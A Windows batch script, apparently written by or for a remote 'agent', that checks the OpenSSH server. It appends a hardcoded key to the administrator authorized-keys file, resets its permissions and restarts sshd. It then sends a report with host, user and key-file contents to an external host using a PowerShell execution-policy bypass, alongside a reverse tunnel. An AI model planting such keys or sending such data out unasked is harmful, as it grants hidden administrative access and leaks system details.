@echo off setlocal EnableDelayedExpansion REM ============================================================ REM Phase 7.x SSH-Verify + ACL-Fix REM REM Prueft warum SSH-Auth abgelehnt wird und repariert die ACL REM auf administrators_authorized_keys (Windows-OpenSSH Pflicht). REM REM Pubkey der hinterlegt sein MUSS: REM ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIHHnVdZo59KSZ7R8T7cN+AFXx5nMd06vq/5nx36xVX2X REM REM Rechtsklick -> "Als Administrator ausfuehren" (UAC: Ja) REM ============================================================ set "OUTFILE=%USERPROFILE%\Desktop\PHASE7X_SSH_VERIFY.txt" set "AGENT_HOST=bridge.xxbillion.ai" set "ADMINKEYS=C:\ProgramData\ssh\administrators_authorized_keys" set "USERKEYS=%USERPROFILE%\.ssh\authorized_keys" set "EXPECTED_PUBKEY=AAAAC3NzaC1lZDI1NTE5AAAAIHHnVdZo59KSZ7R8T7cN+AFXx5nMd06vq/5nx36xVX2X" echo. > "%OUTFILE%" echo ============================================ >> "%OUTFILE%" echo Phase 7.x SSH-Verify + ACL-Fix >> "%OUTFILE%" echo Datum: %DATE% %TIME% >> "%OUTFILE%" echo Host : %COMPUTERNAME% >> "%OUTFILE%" echo User : %USERDOMAIN%\%USERNAME% >> "%OUTFILE%" echo ============================================ >> "%OUTFILE%" echo. >> "%OUTFILE%" echo --- 1. sshd Service Status --- >> "%OUTFILE%" sc query sshd >> "%OUTFILE%" 2>&1 echo. >> "%OUTFILE%" echo --- 2. SSH Listen-Port --- >> "%OUTFILE%" netstat -an ^| findstr ":22 " >> "%OUTFILE%" 2>&1 echo. >> "%OUTFILE%" echo --- 3. administrators_authorized_keys vorhanden? --- >> "%OUTFILE%" if exist "%ADMINKEYS%" ( echo Datei existiert: %ADMINKEYS% >> "%OUTFILE%" echo Groesse + ACL: >> "%OUTFILE%" dir "%ADMINKEYS%" >> "%OUTFILE%" 2>&1 icacls "%ADMINKEYS%" >> "%OUTFILE%" 2>&1 echo Inhalt: >> "%OUTFILE%" type "%ADMINKEYS%" >> "%OUTFILE%" 2>&1 ) else ( echo NICHT VORHANDEN: %ADMINKEYS% >> "%OUTFILE%" ) echo. >> "%OUTFILE%" echo --- 4. user authorized_keys vorhanden? --- >> "%OUTFILE%" if exist "%USERKEYS%" ( type "%USERKEYS%" >> "%OUTFILE%" 2>&1 ) else ( echo NICHT VORHANDEN: %USERKEYS% >> "%OUTFILE%" ) echo. >> "%OUTFILE%" echo --- 5. Expected pubkey check --- >> "%OUTFILE%" findstr /C:"%EXPECTED_PUBKEY%" "%ADMINKEYS%" >nul 2>&1 if !ERRORLEVEL!==0 ( echo OK: Pubkey ist in administrators_authorized_keys >> "%OUTFILE%" ) else ( echo FEHLT: Pubkey ist NICHT in administrators_authorized_keys -- wird jetzt geschrieben >> "%OUTFILE%" if not exist "C:\ProgramData\ssh" mkdir "C:\ProgramData\ssh" >nul 2>&1 echo ssh-ed25519 %EXPECTED_PUBKEY% linux-host-to-windows-workstation-01 >> "%ADMINKEYS%" echo Neu geschrieben: >> "%OUTFILE%" type "%ADMINKEYS%" >> "%OUTFILE%" ) echo. >> "%OUTFILE%" echo --- 6. ACL auf administrators_authorized_keys reparieren --- >> "%OUTFILE%" REM Windows-OpenSSH-Pflicht: NUR SYSTEM und Administrators duerfen lesen. REM Alle anderen Eintraege entfernen, sonst ignoriert sshd den File. icacls "%ADMINKEYS%" /inheritance:r >> "%OUTFILE%" 2>&1 icacls "%ADMINKEYS%" /grant "SYSTEM:F" >> "%OUTFILE%" 2>&1 icacls "%ADMINKEYS%" /grant "BUILTIN\Administrators:F" >> "%OUTFILE%" 2>&1 icacls "%ADMINKEYS%" /remove "BUILTIN\Users" >> "%OUTFILE%" 2>&1 icacls "%ADMINKEYS%" /remove "Authenticated Users" >> "%OUTFILE%" 2>&1 echo ACL nach Fix: >> "%OUTFILE%" icacls "%ADMINKEYS%" >> "%OUTFILE%" 2>&1 echo. >> "%OUTFILE%" echo --- 7. sshd neu starten damit ACL-Change greift --- >> "%OUTFILE%" net stop sshd >> "%OUTFILE%" 2>&1 net start sshd >> "%OUTFILE%" 2>&1 echo. >> "%OUTFILE%" echo --- 8. Final sshd-Status --- >> "%OUTFILE%" sc query sshd >> "%OUTFILE%" 2>&1 echo. >> "%OUTFILE%" echo ============================================ >> "%OUTFILE%" echo ENDE - bitte kurz warten + ich teste Connect >> "%OUTFILE%" echo ============================================ >> "%OUTFILE%" type "%OUTFILE%" echo. echo --- Auto-Send an Agent --- powershell -NoProfile -ExecutionPolicy Bypass -Command "try { $b = Get-Content -Raw -Encoding UTF8 -Path '%OUTFILE%'; $r = Invoke-RestMethod -Method POST -Uri 'https://%AGENT_HOST%/submit' -ContentType 'text/plain; charset=utf-8' -Body $b -TimeoutSec 15; Write-Host ('OK -- Agent hat es: id=' + $r.id) -ForegroundColor Green } catch { Write-Host ('FEHLER Auto-Send: ' + $_.Exception.Message) -ForegroundColor Red }" echo. echo Tunnel-Restart noetig damit sshd-Restart nicht den Tunnel zerreisst: echo Doppelklick PHASE7X_REVERSE_TUNNEL.cmd nochmal echo. pause